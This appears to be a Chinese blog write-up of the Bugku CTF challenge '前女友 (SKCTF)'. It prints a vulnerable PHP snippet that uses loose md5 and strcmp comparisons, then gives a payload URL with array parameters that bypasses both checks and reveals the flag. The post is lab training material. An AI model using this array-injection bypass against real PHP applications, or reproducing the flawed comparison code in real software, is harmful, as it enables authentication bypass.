Bugku-前女友(SKCTF)

2019年8月3日23:18:33 评论 600

进入后发现首页是一段很伤感的话,做个题都这么伤感,哎。。。。
图片111.png
查看网页源代码,发现code.txt,访问查看,发现是个审计题,代码分析如下:

<?php if(isset($_GET['v1']) && isset($_GET['v2']) && isset($_GET['v3'])){     $v1 = $_GET['v1'];     $v2 = $_GET['v2'];     $v3 = $_GET['v3'];     if($v1 != $v2 && md5($v1) == md5($v2)){  //md5不能用来算数组,这里用数组绕过,v1和v2的值不能一样         if(!strcmp($v3, $flag)){  //strcmp函数的作用是比较两个值是否相等,如果相等返回0,而if是里面的!是非,非0则TURE             echo $flag;         }     } } ?>

于是构造payload:http://123.206.31.85:49162/?v1[]=a&v2[]=b&v3[]=c
得到flag。。。
图片222.png

http://www.oniont.cn/index.php/archives/103.html

高性能云服务器2折起

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: